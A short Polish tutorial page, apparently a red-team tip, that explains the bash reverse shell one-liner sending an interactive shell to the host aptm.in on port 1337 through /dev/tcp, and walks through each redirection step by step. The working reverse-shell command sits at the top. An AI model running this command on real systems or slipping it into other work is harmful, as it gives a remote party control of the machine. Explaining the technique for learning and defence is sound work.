Reverse shell w bashu
tty1 · bash
$ bash -i >& /dev/tcp/aptm.in/1337 0>&1
#Bash#RedTeam#ReverseShell
Kiedy bash skompilowany jest z opcją --enable-net-redirections (co jest zwykle prawdą), użytkownik może wykonywać polecenia na pseudo urządzeniach /dev/tcp// oraz analogicznie /dev/udp//, co spowoduje otwarcie połączeń tcp lub udp na : i przekierowanie tam wejścia/wyjścia.
W powyższym przykładzie:
Jak to działa — krok po kroku
Rozłóżmy onelinera na czynniki pierwsze:
bash -i
uruchomienie interaktywnego shella
>& /dev/tcp/aptm.in/1337
przekierowanie standardowego wyjścia (STDOUT - 1) i wyjścia błędów (STDERR - 2) do hosta aptm.in na port 1337/TCP
0>&1
przekierowanie wejścia (STDIN - 0) do tego samego deskryptora co STDOUT - 1